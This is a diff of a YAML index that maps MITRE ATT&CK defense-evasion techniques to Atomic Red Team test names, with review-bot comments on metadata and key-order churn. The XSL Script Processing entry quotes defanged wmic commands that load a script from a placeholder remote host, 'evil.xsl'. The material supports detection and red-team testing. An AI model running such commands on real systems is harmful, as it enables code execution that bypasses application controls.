- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -28376,8 +28695,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests:
- name: WINWORD Remote Template Injection
@@ -28402,7 +28719,7 @@ defense-evasion:
name: command_prompt
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -28499,7 +28816,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -28562,7 +28878,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests:
- name: Binary simply packed by UPX (linux)
@@ -28684,7 +28999,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -28711,8 +29026,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -28740,7 +29053,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -28784,8 +29097,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -28840,7 +29151,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -28860,7 +29171,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests:
- name: Detect a Debugger Presence in the Machine
@@ -28922,7 +29232,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests:
- name: Space After Filename (Manual)
@@ -29007,7 +29316,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests:
- name: Mimikatz Pass the Hash
@@ -29132,7 +29440,7 @@ defense-evasion:
name: powershell
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -29182,7 +29490,6 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -29301,7 +29608,7 @@ defense-evasion:
elevation_required: true
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -29361,8 +29668,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -29379,37 +29686,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
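Review bot: with the `|+` keep indicator and the empty line that closes the block just before `kill_chain_phases:`, the new description ends in two newlines, whereas the replaced quoted scalar ended in a single `\n`; if the serializer is reproducing the upstream string verbatim that is expected, otherwise `|` would normalise the trailing whitespace. Separately, "an overwrites file (if connected to an MDM)" in the second paragraph reads like a typo in the upstream ATT&CK text; since this index mirrors that text, it belongs in an upstream report rather than a local edit.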
@@ -29417,6 +29705,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -29424,7 +29714,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -29454,7 +29744,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -29500,7 +29789,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -29545,8 +29834,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
@@ -29591,7 +29878,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -29605,7 +29892,6 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests:
- name: Dynamic API Resolution-Ninja-syscall
@@ -29647,53 +29933,24 @@ defense-evasion:
elevation_required: true
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
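Review bot: the only substantive change in the description is the added `(Citation: Hexacorn Listplanting)` marker after "separate live process", which needs a matching `source_name: Hexacorn Listplanting` entry under `external_references`; that entry is added in the next hunk of this record, so the citation resolves. The rest of this hunk is churn: the description lines are re-wrapped at different column positions, and the removed `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `id`, `type`, `created` and `external_references` lines reappear lower in the record. A key-order or line-width change in the generator is better landed as its own commit so that content updates like this one stay reviewable.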
@@ -29710,6 +29967,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -29724,16 +29984,47 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests:
- name: Process injection ListPlanting
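Review bot: `external_references` is emitted in a different order than before (mitre-attack, Hexacorn, ESET, Microsoft, Modexp here versus mitre-attack, Microsoft, Modexp, ESET in the removed block) and the record's keys now come out in a different sequence, with `type`, `id`, `created` and `external_references` after the `x_mitre_*` fields instead of before. Neither ordering is wrong, but if the generator does not pin a deterministic key and reference order, every regeneration will rewrite whole records and hide real changes; pinning the order (source order from the STIX object, or sorted by `source_name`) would keep future diffs small.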
@@ -29773,7 +30064,7 @@ defense-evasion:
elevation_required: true
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -29818,9 +30109,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
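Review bot: replacing the `Azure AD` and `SaaS` platform values with the single `Identity Provider` value changes which platform-scoped views this technique appears in; any per-platform index or filter in the repository that still keys on `Azure AD` or `SaaS` needs to be updated in the same change, otherwise T1484 silently disappears from those views. The `x_mitre_version` bump from `3.0` to `3.1` alongside the platform change indicates the rename comes from the upstream record rather than a local edit, which is worth stating in the commit message.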
@@ -29877,8 +30167,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -29887,57 +30177,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
@@ -29955,29 +30199,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests:
- name: MSXSL Bypass using local files
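Review bot: the `Microsoft XSLT Script Mar 2017` citation still reads "XSLT Stylesheet Scripting Using . Retrieved July 3, 2018.", with the title cut off after "Using", exactly as in the removed block; if the missing part of Microsoft's title is absent from the underlying file and not only from this rendering of the diff, the generator is dropping it and that should be fixed at the source rather than carried forward. The `twitter.com` to `x.com` host change for the `Twitter SquiblyTwo Detection APR 2018` reference, with the retrieval date moved to September 12, 2024, is consistent with the SyncAppvPublishingServer reference earlier in this patch.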
@@ -30166,7 +30454,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
@@ -30194,8 +30482,6 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests:
- name: Create a hidden file in a hidden directory
@@ -30421,42 +30707,7 @@ defense-evasion:
elevation_required: true
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
